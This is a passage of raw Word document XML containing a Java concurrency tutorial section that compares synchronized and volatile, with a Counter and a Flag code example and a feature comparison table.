          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74964FFB" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Higher overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to acquiring and releasing locks. Synchronization can block threads, leading to potential performance degradation when multiple threads contend for the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45873569" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F18E644" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lower overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it does not involve locking. However, it only provides visibility guarantees, and using it for compound operations can still lead to issues like race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946B8D7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Example Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DC695" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27F7A2"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453A97C"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899FD9F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A3951A"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 Synchronized method to ensure only one thread can modify 'count' at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9BE634"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public synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB37F9"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF388D"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3929650C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04163F86"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FBA10"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1F577"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0F92C786"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFD2BBC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67838CC8"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public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBCCB6B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public static void main(String[] args) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D49DE4"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Counter counter = new Counter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9FB62"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Thread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDCA5A"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for (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167899D1"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counter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB1A677"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594BFE44"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53666B24"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Thread t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B292843"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for (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA4033"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counter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D9E4C"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712EA52B"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2583617A"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t1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F4CBA"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t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F5961"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t1.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4C7F6"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t2.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35380D85"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System.out.println("Final count: " + counter.getCount()); // Should be 2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B8966"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3282DEFA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0FD40" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF077AF"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public class Flag {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C62F1"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private volatile boolean flag = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCA6BE" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF5B624"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public void setFlagTrue() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36596B3B"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flag = true;  // Changes the value of the flag to true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F737C58"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2C760181" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46247AEB"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public boolean isFlagSet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C6709"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return flag;  // Returns the latest value of the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255979B2"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749E68B2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C23617E"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74602BDC"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Flag flag = new Flag();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F9853"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4203764E"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Thread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE531F"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 Simulating some operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01279C5D"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flag.setFlagTrue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A655ED"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733B6380"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48651B36"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Thread t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1CE3E"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hile (!flag.isFlagSet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E20262"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 Wait until flag is true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6982259E"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40EA0B32"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System.out.println("Flag is set!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC4D1C"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6BE7241B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D61003E"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t1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D531BAC"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t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68596475"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486FC794"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034841E6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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8"/>
        <w:gridCol w:w="4166"/>
        <w:gridCol w:w="4070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="4DD29D3D" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0614D2D3" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C2C08">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E899F5" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C2C08">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61672A67" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C2C08">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>volatile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="4F497624" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E7159D"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7334E373"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Provides mutual exclusion for thread safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F06B48D"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Ensures visibility of variable changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="43FD7869" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="504612A7"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4666C3"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Provides mutual exclusion and atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E1155D"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Provides visibility but no atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="7FBC6716" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E013600"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F818062"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For critical sections and synchronized methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6626F61B"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For flags or state variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="2D768A85" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79CBABCD"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="158ADE92"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Uses locks to prevent concurrent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B894DB3"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Does not use locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="025AF956" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37ACD686"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CAEB415"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Guarantees atomicity of code inside synchronized blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="553F8EED"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Does not guarantee atomicity for compound operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="7B6A107F" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="771C068B"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09340C72"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Higher due to lock acquisition and blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CCE24E4"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Lower, no locking involved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="2089F5FA" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F07D7E4"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Typical Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AF21420"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Synchronized methods for shared resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13FB08B6"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Visibility of shared variables, flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67AE32B6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DC677B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use synchronized when you need mutual exclusion, ensuring that only one thread can access a critical section of code at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A9AB9" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00CE4B95" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:jc w:val="both"/>
